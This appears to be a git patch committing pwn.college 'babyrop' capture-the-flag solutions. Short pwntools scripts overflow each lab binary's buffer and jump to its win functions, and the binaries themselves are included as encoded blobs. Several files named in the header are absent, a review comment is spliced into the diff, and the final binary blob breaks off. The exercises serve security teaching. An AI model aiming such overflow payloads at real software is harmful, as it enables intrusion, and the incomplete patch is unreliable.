From 38ba27e986bb1d0dd27ce3a3f5425a423561e05c Mon Sep 17 00:00:00 2001
From: jc
Date: Tue, 5 Aug 2025 17:55:58 +0300
Subject: [PATCH] binary
---
pwn_college/babyrop_level_1.0/a.py | 20 +++++
.../babyrop_level_1.0/babyrop_level_1_0 | Bin 0 -> 30307 bytes
pwn_college/babyrop_level_1.1/a.py | 16 ++++
.../babyrop_level_1.1/babyrop_level_1_1 | Bin 0 -> 21488 bytes
pwn_college/babyrop_level_2.0/a.py | 21 ++++++
.../babyrop_level_2.0/babyrop_level_2_0 | Bin 0 -> 30235 bytes
pwn_college/babyrop_level_2.1/a.py | 17 +++++
.../babyrop_level_2.1/babyrop_level_2_1 | Bin 0 -> 21352 bytes
random_challs/echoooo/a.py | 69 ++++++++++++++++++
9 files changed, 143 insertions(+)
create mode 100644 pwn_college/babyrop_level_1.0/a.py
create mode 100755 pwn_college/babyrop_level_1.0/babyrop_level_1_0
create mode 100644 pwn_college/babyrop_level_1.1/a.py
create mode 100755 pwn_college/babyrop_level_1.1/babyrop_level_1_1
create mode 100644 pwn_college/babyrop_level_2.0/a.py
create mode 100755 pwn_college/babyrop_level_2.0/babyrop_level_2_0
create mode 100644 pwn_college/babyrop_level_2.1/a.py
create mode 100755 pwn_college/babyrop_level_2.1/babyrop_level_2_1
create mode 100644 random_challs/echoooo/a.py
diff --git a/pwn_college/babyrop_level_1.0/a.py b/pwn_college/babyrop_level_1.0/a.py
new file mode 100644
index 0000000..51c78c1
--- /dev/null
+++ b/pwn_college/babyrop_level_1.0/a.py
@@ -0,0 +1,20 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+"""
+patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_1_0
+"""
+
+context.binary = target = ELF("./babyrop_level_1_0", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+buf = b"A"*120
+buf += p64(target.sym.win)
+s(buf)
+
+r.interactive()
\ No newline at end of file
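Review bot: The patchelf command sits in a bare triple-quoted string after `from pwn import *`, so it is an expression statement rather than a module docstring or a comment, and it does not say whether the committed `babyrop_level_1_0` is the file as distributed or one that was already patched. Because `process()` is evidently meant to launch that executable on the reader's machine, I would replace the string with a comment that records the binary's origin and a digest to verify it against, e.g. `# babyrop_level_1_0: <as distributed | patched>, sha256 <SHA256_OF_COMMITTED_FILE>; local fix-up: patchelf --replace-needed ...`. The padding lengths `120` here and `88` in babyrop_level_2.1/a.py are bare literals; a short comment such as `# filler length measured against the committed binary; re-measure if the file changes` would tie each script to the build it was written for. In both files `s = lambda a: r.sendline(a)` names a lambda that is used once, and calling `r.sendline(buf)` directly reads the same.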
diff --git a/pwn_college/babyrop_level_1.0/babyrop_level_1_0 b/pwn_college/babyrop_level_1.0/babyrop_level_1_0 new file mode 100755 index 0000000000000000000000000000000000000000..d3f4927224907cb39315e68b976f12b05da141b5 GIT binary patch literal 30307 zcmeHQe{dVsoqw|9#0|lA0)YUf*^mTmNEF%mfeGUxC04SgPGX!G%C9JEX>DsFOGa7| znrF}T4v}>3z?htuFO%$(K~Pm5V&be=p9V%D8)cZJGWKOgrNF!(hr~ByeMw%F zSR<=uLAH>6iOmEu1D_zT0Uf)B=M>e;MTMf3lJB}-TQQRTys1Vql5a(F(jJpEFiS8h z%A_EXmvV|~Qch9TzO88ApCYI1y&~)ztC}Fa@c^{rD%T#~j?o z*PMFD4dSCjI-Jd+uA_Q!oM~*2uZ9su`s*&f?~C0XhKv#bSK5m5JQqgAo)Y-x68Q5a z@P-n&Q34+>fe)0xe^>&4v;n(?6(qZc^<}LLeMNhWG|O1Ac#`#{<4LOvTFrDinTjM*QNxO-k}Pc+ zF=9z&E!G=PMpJ2%b(@x%jRQ8V+dH#es7^MzA+%nn5)|Pea zBMtrrxW6KsNz=i%0!LhA%_@2Lbtkg~I$OGm$H)8fBH%^9i+~paF9Kc!ya;#^@FL(v zz>9zv0WShx1iT1%5%415MZk-I7XdEnoQ-^h ziPx&=J;6=cTfENKT0$v3E_YwHd>M#94A3Ra14^@ogiFp0qQLC(QL?3*y z@(@>6Sp6R0$-+{4p1gV?BYt|8mrahpTPPGpc$p?XljE=3Wt#9zjvutkG|`zHf6^|~ z1ZQ&myLOo-Hk0Guw97Q1nH;~zF4IJ2a{M;COcR*Nal4y)FUP9#X43NV72b&l>$;Zc`E`RmHy@(-WBM0_lBBwXew{^||f@sKn z;dufIV_hSMy3R0HFATEhIR8B#agv+R4}Nrwe(+Se?t58({WEK>tznkb;FhQU+0*nP zd|}yhI`rJH^LLRVh(kLwr$1Xu|Uu5KC0)kNA%&QU*Jzf z^7Ank^x?BFxETHq&(}CveJLkReh}_gej(>-dW} z`x0ULQ240sJJLF|02Mo@R_KGHv#OtF&DBpI0mHS^GRzbVuYjR$T80Y2FbamsX&GjK zq5A1lsLwY|@eMAN^LjGy%Cz-m!oV09o|u-w#}yn!{Wqr8^Ex;;e<#%)e6L&|TD=3= z*5PHJh!|y$w)#E_Z4I@Dt_!u@a9ud}ZYXy&cMv^uEOZ`>*Rhe0mC9wH<9u$jL(bW7;gTMwxr05yBi`}_3a@R*)^;W;|@ zJWnUI{F9Kt*qsZ@kCO%;%Hz-QZVm6#b1wrwV0&~fc{BukDVso!{0)zgz93ZTx!1V; zTzFz|_XHcbB>(+C779ab@YI~_c~Engt>$OI$D6o~j(yNKrVnpIB(wWka<7KO!H|3X zS)ucA{vB}Zxo}<|+?{9Ddw)Wv4u?;Hu<;=((1082IE6S@V&Lh+ZS4Zu1n6BruOM;_ zqA7E1A6iJOOOn`zSATpVwdHXB25=xUS543Ln&he%T<7S6;Zr`ap3<)l=c~WgjpI`a z=Jnj0r0?(_3Wej>A`pKAQE_O!2^*h z^bPJlS$)@$=jjI`Uk^<5>fw9^e0kN;=O;Auc|MmthVbNv!pFF}MqAwmZv8a3zIZ5n zT7TGa4Cg77Lp%`A;GiE2pZ0;}>hQ5U-w=im{1=AW8EYe6@*?0xz>9zv0WShx1pXW% z;F$gmH{FKy=KPY$Lg6|3y~ix%P5@#S@*L1y#l!WC4OKjd?|VlFTJqx`)7%ZymQmD- 
z$X!YK23Vl6f;1HysdoSgmLH_uzp^9su@>#mAfVtIHj57$0>^xQ-JG&dV=>L%`aLh@fJKa=vgF+Ept44U;ECT*!T!Py}`A>dFzK2Jir5jUVq(5h7`4!;Eg-^=~t5G$ z|3b4y3Qg_>)N>yyp-D9PO|GtK1*v{STXJuPI$Cm{gtmopr#tlFZLRy1*0}Q3A41Q;Ps^=^ z^>0-#+(Qj(%}uuEK5EYWCR8~09ewbSPrvHz>~CrP>*ibOLNK&F6mhO8kUd%%Bg)s! z?3FUo<|QuzUIe@dcoFa-;6=cTfENKT0$v2X2>kg*z=vlgDP6Jre@dk}rmeYxH5-

0` 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 BdUOB) literal 0 HcmV?d00001 diff --git a/pwn_college/babyrop_level_2.1/a.py b/pwn_college/babyrop_level_2.1/a.py new file mode 100644 index 0000000..15b049b --- /dev/null +++ b/pwn_college/babyrop_level_2.1/a.py @@ -0,0 +1,17 @@ +#!/usr/bin/python3 + +from pwn import * + +context.binary = target = ELF("./babyrop_level_2_1", checksec=False) +r = process() + +# funcs +s = lambda a: r.sendline(a) + +# buf +buf = b"A"*88 +buf += p64(target.sym.win_stage_1) +buf += p64(target.sym.win_stage_2) +s(buf) + +r.interactive() \ No newline at end of file 
diff --git a/pwn_college/babyrop_level_2.1/babyrop_level_2_1 b/pwn_college/babyrop_level_2.1/babyrop_level_2_1 new file mode 100755 index 0000000000000000000000000000000000000000..4cadcbbcff1d240e11f89920f2983ea85b7a43f3 GIT binary patch literal 21352 zcmeHPeQX@X6`#AaV?&bj<%=F6As3RgNmO6XfrNv~WY6*0Yj6^i#3WS->$7idpE%!{ zyS)%2LXE=L)wsA4N~u&;MxwwUR86R8Q(C}jP!j$@36-iy{otd}o*_iWgf_HEw(rf( zyW3sgwN)$i54vORzIng*F|%)G*E@4N^UY{`i`(U5l-%qVhFr%yi9^PjvFC5&tiZx- zE|b_Yb}gF)NEI9smmoEAM9;Vl0nu8a=K+d#e#~$xS?ChZF-DYXh!pKgNfKFu`f3c8 zDDxRS+Ers#@XRM62fW0|qD7oAqNG_DH}XZ_ofTkOKV7nB8u-u-h&4i8c#;qF4r| z9Uo}%|D?PQvJ>$Pi+B=^8}1oVD(`l%!?^sriJE!4D6djGOt}n?LxE@tpK9IO$)MdP5EEhKZLv`BD1Z2s(RarVUfp^Q`&w&GVjO!1uVV93%a{*hk^zkKqoiVyxK&%M` z^Q{o)W>>)Ptbkuz0dJ^)-&g@(RRO=X0-gdq0Eay_0Z{I`8Y|#y0iVYfv%wAta;5(7 zhdkoLHk?8G_h55xWP>>^i>IFcScYY_cp}9HGl`Ve%Q9*#jz~JEv1C?N?`A#8bXH~Q zK{ds)s<}jPv*cI6Zl~$m5IO^yJYZk1u@FlZT5uzUWO)K3(MT1#f!t zJ4GH}?4~ClEb{n5H$8bzk;fO>>B$)JP`fR>cFl~}5BR8!Z?y3nY<#_qUuEN$+W18_ zey*8s__!^9`Yt*Do_yf_sg9j(Cnne`iODC9j;%y;;>{Hj(-&o6gnypL?^tiJZrMX{ zO^l5l!54A45zpF!BM4!WT=5zL`a8X2$9hZ3b;~67D%XGT94GlH`RKV#^3e+(*>zk# zeOa4V^iU%_*zK|Xh8y?eY(s8Ar=0(wa36&Ac=g?Yxb_^IQ6B1l^esH2@|csH2sjaN zBH%>8iGULUCjw3coCr7(a3bJDz=?npfiGSJ_8g<3zx?3Y0L=U3UpaeO*I(rm6{C$W z!cT;J%AxT7IbF|3FOEbnzKpX$Tp@p=Fbc4o|CN07!%ed5lzjTafeBYWdI8nY1*!Fd z+DP<*+;d7E9i4&#KtayG2@aCn@A;AFc`keyg>wG*Yd8f}sN-fAL2U!%#@_hnm8~vT z_D1e>MrGgmxI$&2VkfD}Mzvl7)$$eo1xWJI3KhPKn_-0?f}FX+2hI-W_rD%P(f?98%g$o*qPRS$a z2+&1TdCHKkK`F-HDt(Jfq41F{ zQ^n?60+UNn%whP+wQxHq@WS6PO@LwditK71ZOpD=EOJL%{x^}%w)|(2oss;-PIbNw1&1KGv?r_9jw&%h`$*EAR;HQj z6u}XOI*tQnUSEsXe{0?BduxZ;ro}g}y?*6&2xB=(I1Yi{7y=?;8Tiw@7p~#&b&!dA zeUG>|&z{%?Dt-oR*8)Vuoe>Sk}~ky)}g ze4wV)E2X^Qh&L4Ru5R)Mn!Nrdudm5l%j1~@KU3g`Vu$XW+2sjaN 